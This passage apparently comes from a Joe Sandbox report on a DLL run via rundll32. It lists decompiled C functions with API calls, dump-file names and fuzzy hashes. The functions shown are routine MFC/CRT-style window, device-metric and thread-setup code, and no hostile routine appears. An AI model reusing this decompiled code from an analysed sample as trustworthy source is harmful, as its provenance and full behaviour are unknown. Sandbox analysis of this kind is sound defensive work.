						 *(_t64 - 0x34) = GetDlgCtrlID(_t62) & 0x0000ffff;
						_push(_t62);
						 *((intOrPtr*)(_t64 - 0x24)) = _t64 - 0x88;
						if(E10022115() == 0 || E1001FE3C(_t35, 0, 0xbd11ffff, _t64 - 0x38, 0) == 0) {
							if(E1001FE3C( *((intOrPtr*)(_t64 - 0x10)),  *(_t64 - 0x34), 0xffffffff, _t64 - 0x38, 0) == 0) {
								_t46 =  *((intOrPtr*)(_t64 + 0xc));
								if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
									if((SendMessageA( *(_t64 - 0x6c), 0x87, 0, 0) & 0x00000020) == 0) {
										L11:
										_t46 = 0;
									} else {
										_t42 = E100202AB(_t64 - 0x88) & 0x0000000f;
										if(_t42 == 3 || _t42 == 6 || _t42 == 7 || _t42 == 9) {
											goto L11;
										}
									}
								}
								E1001FFDA(_t64 - 0x38,  *((intOrPtr*)(_t64 + 8)), _t46);
							}
						}
						_t62 = GetWindow(_t62, 2);
					} while (_t62 != 0);
				}
				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
				 *(_t64 - 0x6c) = 0;
				_t31 = E10022977(_t64 - 0x88);
				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
				return _t31;
			}

APIs

__EH_prolog.LIBCMT ref: 10022C9E
GetTopWindow.USER32(?), ref: 10022CC8
GetDlgCtrlID.USER32 ref: 10022CDD
SendMessageA.USER32 ref: 10022D39
GetWindow.USER32(00000000,00000002), ref: 10022D77

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$CtrlH_prologMessageSend
String ID:
API String ID: 4125289812-0
Opcode ID: 19a7042d3ee7ac9ff937cd3b65bdcc34620a1ee98de378f8268fb43055ccdf2e
Instruction ID: f32dedf2229806a380f5c1e0926675dad0c5831b186d9175a334cabdc35765a6
Opcode Fuzzy Hash: 19a7042d3ee7ac9ff937cd3b65bdcc34620a1ee98de378f8268fb43055ccdf2e
Instruction Fuzzy Hash: 7931D435C00258BECB25DBA4EC84AFDB7B8FF56250F90421AF456E7151DB30AE85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100316E6 Relevance: 7.6, APIs: 5, Instructions: 66
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100316E6(void* __ecx, unsigned int _a4) {
				struct HWND__* _t20;
				void* _t23;
				void* _t33;
				void* _t34;
				struct HWND__* _t35;

				_t34 = __ecx;
				if((E100202AB(__ecx) & 0x40000000) == 0) {
					_t33 = E10022AD5(__ecx);
				} else {
					_t33 = __ecx;
				}
				if((_a4 & 0x0000000c) != 0) {
					_t23 = E100203CE(_t33);
					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t33 == _t34) {
						SendMessageA( *(_t33 + 0x1c), 0x86, 0, 0);
					} else {
						 *(_t34 + 0x39) =  *(_t34 + 0x39) | 0x00000002;
						SendMessageA( *(_t33 + 0x1c), 0x86, 1, 0);
						 *(_t34 + 0x39) =  *(_t34 + 0x39) & 0x000000fd;
					}
				}
				_t20 = GetWindow(GetDesktopWindow(), 5);
				while(1) {
					_t35 = _t20;
					if(_t35 == 0) {
						break;
					}
					if(E100310CC( *(_t33 + 0x1c), _t35) != 0) {
						SendMessageA(_t35, 0x36d, _a4, 0);
					}
					_t20 = GetWindow(_t35, 2);
				}
				return _t20;
			}

APIs

Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6

SendMessageA.USER32 ref: 1003173F
SendMessageA.USER32 ref: 10031753
GetDesktopWindow.USER32 ref: 10031757
SendMessageA.USER32 ref: 1003177F
GetWindow.USER32(00000000), ref: 10031784

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSendWindow$DesktopLong
String ID:
API String ID: 2272707703-0
Opcode ID: 73e2593b8f262eaeb4f4e94dd705a49f5985a06933a3941b6edb2e6593d9f2be
Instruction ID: b2d0115702f01622c71e7e90a3c3b5da49a9f5b0f30be2a1795dd18db7154202
Opcode Fuzzy Hash: 73e2593b8f262eaeb4f4e94dd705a49f5985a06933a3941b6edb2e6593d9f2be
Instruction Fuzzy Hash: AC1106312447156BE333CA219C86FDE7ABAEF4AB91F154114F6409E1D2CF91EC418395

Uniqueness

Uniqueness Score: -1.00%

Function 10031E6F Relevance: 7.6, APIs: 5, Instructions: 62
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10031E6F(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, struct HWND__* _a4, unsigned int _a8) {
				intOrPtr _v8;
				char _v268;
				intOrPtr _v272;
				intOrPtr _t20;
				int _t24;
				unsigned int _t45;
				intOrPtr _t52;

				_t20 =  *0x1004c470; // 0x12db9c4b
				_v8 = _t20;
				_v272 = __ecx;
				_t52 =  *((intOrPtr*)(E100373B5() + 4));
				if(_t52 != 0 && _a8 != 0) {
					_t45 = _a8 >> 0x10;
					if(_t45 != 0) {
						_t24 =  *(_t52 + 0x8c);
						if(_a8 == _t24 && _t45 ==  *(_t52 + 0x8e)) {
							GlobalGetAtomNameA(_t24,  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							GlobalGetAtomNameA(0,  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							SendMessageA(_a4, 0x3e4,  *(_v272 + 0x1c), ( *(_t52 + 0x8e) & 0x0000ffff) << 0x00000010 |  *(_t52 + 0x8c) & 0x0000ffff);
						}
					}
				}
				return E100117AE(0, _v8);
			}

0x10031e78
0x10031e7e
0x10031e81
0x10031e8c
0x10031e91
0x10031ea5
0x10031eab
0x10031eb1
0x10031ebc
0x10031edc
0x10031eeb
0x10031f03
0x10031f0c
0x10031f33
0x10031f3a
0x10031ebc
0x10031eab
0x10031f47

APIs

GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 10031EDC
GlobalAddAtomA.KERNEL32 ref: 10031EEB
GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 10031F03
GlobalAddAtomA.KERNEL32 ref: 10031F0C
SendMessageA.USER32 ref: 10031F33

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AtomGlobal$Name$MessageSend
String ID:
API String ID: 1515195355-0
Opcode ID: 18f948bbb074b7511017b7146c05a941aef01dbd5fd54326c2498a16bdc2d2e7
Instruction ID: 486b4a3070eef5cedf278f6f896eb776bbd2baf7572d0ea587dcdbf0f4b3db2c
Opcode Fuzzy Hash: 18f948bbb074b7511017b7146c05a941aef01dbd5fd54326c2498a16bdc2d2e7
Instruction Fuzzy Hash: 301130759001189EDB51DB65CC90AEAB3F8FF18740F408455E599DB141DBB4AAC1CF60

Uniqueness

Uniqueness Score: -1.00%

Function 10033E13 Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E10033E13(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x1004efa8; // 0x60
					_t12 =  *0x1004efac; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E10028F83(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

APIs

GetMapMode.GDI32(?,?,?,?,?,?,1000A1B6,?,00000000,?,746B8B90), ref: 10033E23
GetDeviceCaps.GDI32(?,00000058), ref: 10033E5D
GetDeviceCaps.GDI32(?,0000005A), ref: 10033E66

Part of subcall function 10028F83: MulDiv.KERNEL32(?,00000000,00000000), ref: 10028FC3
Part of subcall function 10028F83: MulDiv.KERNEL32(00000000,00000000,00000000), ref: 10028FE0

MulDiv.KERNEL32(?,000009EC,00000060), ref: 10033E8A
MulDiv.KERNEL32(00000000,000009EC,746B8B90), ref: 10033E95

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: bc12bf045409c33661820cc2be5f7907c0cdbee5fcc122a38f5508f39634e8b5
Instruction ID: 1735433994fc482824355aeef04517b355e33a0d4513a8ab2ef99d7773c3569a
Opcode Fuzzy Hash: bc12bf045409c33661820cc2be5f7907c0cdbee5fcc122a38f5508f39634e8b5
Instruction Fuzzy Hash: AA11E135600614EFEB229F65CC84C0EBBEAEF89751B118429F9859B3A1C771ED018F90

Uniqueness

Uniqueness Score: -1.00%

Function 10033EA1 Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E10033EA1(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x1004efa8; // 0x60
					_t12 =  *0x1004efac; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t10 =  &(_t36[1]); // 0x4689ec45
						_t14 = MulDiv( *_t10, _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E10028F1A(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

APIs

GetMapMode.GDI32(?,00000000,?,?,?,?,1000A1EA,?), ref: 10033EB1
GetDeviceCaps.GDI32(?,00000058), ref: 10033EEB
GetDeviceCaps.GDI32(?,0000005A), ref: 10033EF4

Part of subcall function 10028F1A: MulDiv.KERNEL32(1000A1EA,00000000,00000000), ref: 10028F5A
Part of subcall function 10028F1A: MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 10028F77

MulDiv.KERNEL32(1000A1EA,00000060,000009EC), ref: 10033F18
MulDiv.KERNEL32(4689EC45,?,000009EC), ref: 10033F23

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: 833bac8d30de56bf327d299826c07e3a3159bd3f9899bf9753b6f554495b0d72
Instruction ID: d9f530c2cd1e86ac66058578f4e3f5f9ceac98c77ead6ae7da37ff5c198008ea
Opcode Fuzzy Hash: 833bac8d30de56bf327d299826c07e3a3159bd3f9899bf9753b6f554495b0d72
Instruction Fuzzy Hash: 6D11C235600614EFE7229F65CC84C0EBBFAEF85752B118429F9859B361C771EC018F90

Uniqueness

Uniqueness Score: -1.00%

Function 1001519D Relevance: 7.5, APIs: 5, Instructions: 37
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 41%

			E1001519D(void* __edi) {
				void* __ebx;
				void* __esi;
				long _t5;
				long _t11;
				long _t12;
				long* _t17;

				_t5 = GetLastError();
				_t12 = _t5;
				_t17 =  *0x1004f5e0( *0x1004c848);
				_t18 = _t17;
				if(_t17 == 0) {
					_push(0x8c);
					_push(1);
					_t17 = E1001382A(_t12, __edi, _t17, _t18);
					if(_t17 == 0) {
						L4:
						E10011400(0x10);
					} else {
						_push(_t17);
						_push( *0x1004c848);
						if( *0x1004f5e4() == 0) {
							goto L4;
						} else {
							_t17[0x15] = 0x1004cb00;
							_t17[5] = 1;
							_t11 = GetCurrentThreadId();
							_t17[1] = _t17[1] | 0xffffffff;
							 *_t17 = _t11;
						}
					}
				}
				SetLastError(_t12);
				return _t17;
			}

APIs

GetLastError.KERNEL32(?,00000000,100136FA,100139FA,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010,10015375), ref: 1001519F
FlsGetValue.KERNEL32(?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?,10041D40), ref: 100151AD
SetLastError.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 10015203

Part of subcall function 1001382A: __lock.LIBCMT ref: 1001386E
Part of subcall function 1001382A: RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC

FlsSetValue.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 100151D4
GetCurrentThreadId.KERNEL32 ref: 100151EC

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLastValue$AllocateCurrentHeapThread__lock
String ID:
API String ID: 1487844433-0
Opcode ID: b2f315a77b2b4df7a3c1e85649ddbe99070d14f731bb33650b41be055e3ed3d9
Instruction ID: 04c9e0168ef1b4a2d5000d056184ae8950552c627320cfc90ecd4b0af594dd98
Opcode Fuzzy Hash: b2f315a77b2b4df7a3c1e85649ddbe99070d14f731bb33650b41be055e3ed3d9
Instruction Fuzzy Hash: F4F0C2326017269FE3225F648C49E463BE0EB017A2F104219F942CE1E1DFB5C8808794

Uniqueness

Uniqueness Score: -1.00%

Function 10016B44 Relevance: 7.5, APIs: 5, Instructions: 32
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10016B44() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t7;
				signed int _t9;
				signed int _t10;
				signed int _t11;
				signed int _t15;
				signed int _t22;

				_t7 =  *0x1004c470; // 0x12db9c4b
				if(_t7 == 0 || _t7 == 0xbb40e64e) {
					GetSystemTimeAsFileTime( &_v12);
					_t9 = GetCurrentProcessId();
					_t10 = GetCurrentThreadId();
					_t11 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t15 = _v16 ^ _v20.LowPart;
					_t22 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t9 ^ _t10 ^ _t11 ^ _t15;
					 *0x1004c470 = _t22;
					if(_t22 == 0) {
						 *0x1004c470 = 0xbb40e64e;
					}
					return _t15;
				}
				return _t7;
			}

0x10016b4a
0x10016b51
0x10016b5f
0x10016b6b
0x10016b73
0x10016b7b
0x10016b87
0x10016b90
0x10016b93
0x10016b95
0x10016b9b
0x10016b9d
0x10016b9d
0x00000000
0x10016ba7
0x10016ba9

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 10016B5F
GetCurrentProcessId.KERNEL32 ref: 10016B6B
GetCurrentThreadId.KERNEL32 ref: 10016B73
GetTickCount.KERNEL32 ref: 10016B7B
QueryPerformanceCounter.KERNEL32(?), ref: 10016B87

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: c4e665b203c20cf87cd8f2106384ef992f2c3d3f5cabc43c5d4d3063469ed334
Instruction ID: 11add00fd643567121de8b49d98352c3af742b412758f19a40badcee8712c011
Opcode Fuzzy Hash: c4e665b203c20cf87cd8f2106384ef992f2c3d3f5cabc43c5d4d3063469ed334
Instruction Fuzzy Hash: 21F0FF72C012289FDB11DBF5CE8899AB7F8FF4E355B820551D841EB111DB30D9419B80

Uniqueness

Uniqueness Score: -1.00%

Function 1002C1A7 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 310
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E1002C1A7(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				signed int _v32;
				struct tagRECT _v48;
				signed int _v52;
				signed int _v56;
				struct tagRECT _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t170;
				signed int _t171;
				intOrPtr* _t172;
				signed int _t175;
				signed int _t177;
				intOrPtr* _t179;
				signed char _t183;
				signed int _t184;
				signed int _t186;
				intOrPtr* _t200;
				intOrPtr* _t204;
				signed int _t220;
				intOrPtr* _t223;
				signed char _t233;
				signed int _t247;
				signed int _t249;
				signed int _t258;
				signed int _t261;
				signed int _t266;
				signed int _t268;
				intOrPtr _t270;
				signed int _t273;
				intOrPtr _t275;
				signed int _t277;
				intOrPtr* _t282;

				_t268 = 0;
				_push(0);
				_t223 = __ecx;
				_push(0);
				_push(0x418);
				_v16 = 0;
				_v56 = 0;
				_v52 = 0;
				_t277 =  *((intOrPtr*)( *__ecx + 0x110))();
				_v32 = _t277;
				if(_t277 != 0) {
					_t175 = E1001F77E(_t277 + _t277 * 4 << 2);
					_v16 = _t175;
					if(_t277 > 0) {
						_v12 = _t175;
						do {
							E1002B71F(_t223, _t268, _v12);
							_v12 = _v12 + 0x14;
							_t268 = _t268 + 1;
						} while (_t268 < _t277);
						_t270 = _v16;
						_t177 = 0;
						if(_t277 > 0) {
							_t233 =  *(_t223 + 0x7c);
							if((_t233 & 0x00000002) == 0) {
								_t266 = _t233 & 0x00000004;
								_v48.bottom = _t266;
								if(_t266 == 0) {
									L19:
									_push(_t177);
									asm("sbb eax, eax");
									_t177 =  ~(_a8 & 0x00000002) & 0x00007fff;
									__eflags = _t177;
									goto L20;
								} else {
									if((_a8 & 0x00000004) != 0) {
										L18:
										_push(_t177);
										_push( *((intOrPtr*)(_t223 + 0x6c)));
									} else {
										if((_a8 & 0x00000008) == 0) {
											__eflags = _a8 & 0x00000010;
											if((_a8 & 0x00000010) == 0) {
												__eflags = _a12 - 0xffffffff;
												if(_a12 == 0xffffffff) {
													__eflags = _t233 & 0x00000001;
													if((_t233 & 0x00000001) == 0) {
														goto L19;
													} else {
														goto L18;
													}
												} else {
													SetRectEmpty( &_v48);
													 *((intOrPtr*)( *_t223 + 0x13c))( &_v48, _a8 & 0x00000002);
													_t220 = _a8 & 0x00000020;
													__eflags = _t220;
													if(_t220 == 0) {
														_t258 = _v48.right - _v48.left;
														__eflags = _t258;
													} else {
														_t258 = _v48.bottom - _v48.top;
													}
													_push(_t220);
													_push(_t258 + _a12);
												}
											} else {
												_push(0);
												L20:
												_push(_t177);
											}
										} else {
											_push(0);
											_push(0x7fff);
										}
									}
								}
								_push(_t277);
								_push(_t270);
								E1002BCF4(_t223, _t266);
							}
							_push(_t277);
							_push(_t270);
							_push( &(_v48.right));
							_t179 = E1002BBD2(_t223);
							_v56 =  *_t179;
							_v52 =  *((intOrPtr*)(_t179 + 4));
							if((_a8 & 0x00000040) != 0) {
								_t261 = 0;
								_v8 = 0;
								_a12 = 0;
								_v48.bottom =  *((intOrPtr*)(_t223 + 0x9c));
								 *((intOrPtr*)(_t223 + 0x9c)) = 0;
								if(_t277 > 0) {
									_t200 = _t270 + 4;
									_v24 = _t200;
									_t247 = _t277;
									do {
										if(( *(_t200 + 5) & 0x00000001) != 0 &&  *_t200 != 0) {
											_t261 = _t261 + 1;
										}
										_t200 = _t200 + 0x14;
										_t247 = _t247 - 1;
									} while (_t247 != 0);
									_a12 = _t261;
									if(_t261 > 0) {
										_t273 = E1001F77E(_t261 + _t261 * 2 << 3);
										if(_t273 == 0) {
											_t64 =  &_v8;
											 *_t64 = _v8 & 0x00000000;
											__eflags =  *_t64;
										} else {
											E1002B8AD(_t273, 0x18, _a12, 0x1002be80);
											_v8 = _t273;
										}
										_a12 = _a12 & 0x00000000;
										_v12 = _v12 & 0x00000000;
										_t204 = _v24;
										_t275 = _v8 + 8;
										_v20 = _t275;
										_v24 = _t204;
										do {
											if(( *(_t204 + 5) & 0x00000001) != 0 &&  *_t204 != 0) {
												_t249 = _v12;
												 *((intOrPtr*)(_t275 - 8)) = _t249;
												 *((intOrPtr*)(_t275 - 4)) =  *_t204;
												 *((intOrPtr*)( *_t223 + 0x16c))(_t249,  &_v72);
												E10028E96(_t223,  &_v72);
												_a12 = _a12 + 1;
												_v20 = _v20 + 0x18;
												_t204 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t277 = _v32;
												_t275 = _v20;
											}
											_v12 = _v12 + 1;
											_t204 = _t204 + 0x14;
											_v24 = _t204;
										} while (_v12 < _t277);
									}
								}
								_t183 =  *(_t223 + 0x7c);
								if((_t183 & 0x00000001) != 0 && (_t183 & 0x00000004) != 0) {
									 *((intOrPtr*)(_t223 + 0x6c)) = _v56;
								}
								_t271 = 0;
								_t307 = _t277;
								if(_t277 > 0) {
									_v20 = _v16;
									do {
										E1002B9F8(_t223, _t223, _t271, _t277, _t307, _t271, _v20);
										_v20 = _v20 + 0x14;
										_t271 = _t271 + 1;
									} while (_t271 < _t277);
								}
								_t184 = _a12;
								if(_t184 > 0) {
									_t282 = _v8 + 8;
									_a12 = _t184;
									do {
										_t186 = E10020230(_t223,  *((intOrPtr*)(_t282 - 4)));
										_v32 = _t186;
										if(_t186 != 0) {
											GetWindowRect( *(_t186 + 0x1c),  &_v72);
											_t271 = _v72.left -  *_t282;
											_v24 = _v72.top -  *((intOrPtr*)(_t282 + 4));
											 *((intOrPtr*)( *_t223 + 0x16c))( *((intOrPtr*)(_t282 - 8)),  &_v72);
											E100204FE(_v32, 0, _v72.left + _v72.left -  *_t282, _v24 + _v72.top, 0, 0, 0x15);
										}
										_t282 = _t282 + 0x18;
										_t125 =  &_a12;
										 *_t125 = _a12 - 1;
										_t313 =  *_t125;
									} while ( *_t125 != 0);
									_push(_v8);
									L1001F7A9(_t223, _t271, _t282, _t313);
								}
								_t270 = _v16;
								 *((intOrPtr*)(_t223 + 0x9c)) = _v48.bottom;
							}
							_push(_t270);
							L1001F7A9(_t223, _t270, _t277, _t313);
						}
					}
				}
				SetRectEmpty( &_v72);
				 *((intOrPtr*)( *_t223 + 0x13c))( &_v72, _a8 & 0x00000002);
				_v52 = _v52 + _v72.top - _v72.bottom;
				_v56 = _v56 + _v72.left - _v72.right;
				E1002F49A( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
				_t170 = _v48.right;
				if(_v56 <= _t170) {
					_v56 = _t170;
				}
				_t171 = _v48.bottom;
				if(_v52 <= _t171) {
					_v52 = _t171;
				}
				_t172 = _a4;
				 *_t172 = _v56;
				 *(_t172 + 4) = _v52;
				return _t172;
			}

APIs

SetRectEmpty.USER32(?), ref: 1002C254
GetWindowRect.USER32 ref: 1002C409
SetRectEmpty.USER32(?), ref: 1002C478

Strings

@, xrefs: 1002C2BF

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Rect$Empty$Window
String ID: @
API String ID: 444217639-2766056989
Opcode ID: 0f88fdd43cf5bce15e433ab0bc4ef339b59204e985663dc88836f237ddcb939b
Instruction ID: 58262607db454327f65a07b4950f04bdf16dc99993eabd06514925c449a16dc0
Opcode Fuzzy Hash: 0f88fdd43cf5bce15e433ab0bc4ef339b59204e985663dc88836f237ddcb939b
Instruction Fuzzy Hash: 11C13972D00209DFCB05CFA8D994EAEB7F5FF48350F518569E815AB251DB34AE05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000E14F Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 297
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E1000E14F(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr _t130;
				intOrPtr* _t133;
				intOrPtr* _t140;
				intOrPtr* _t143;
				intOrPtr _t144;
				signed int _t146;
				intOrPtr* _t147;
				void* _t149;
				intOrPtr* _t153;
				signed int _t158;
				intOrPtr _t159;
				intOrPtr* _t161;
				intOrPtr* _t163;
				intOrPtr* _t165;
				intOrPtr* _t166;
				intOrPtr _t169;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr _t174;
				signed int _t178;
				signed int _t180;
				signed int _t186;
				signed int _t188;
				intOrPtr* _t190;
				intOrPtr* _t192;
				intOrPtr _t196;
				intOrPtr _t198;
				intOrPtr* _t199;
				void* _t200;
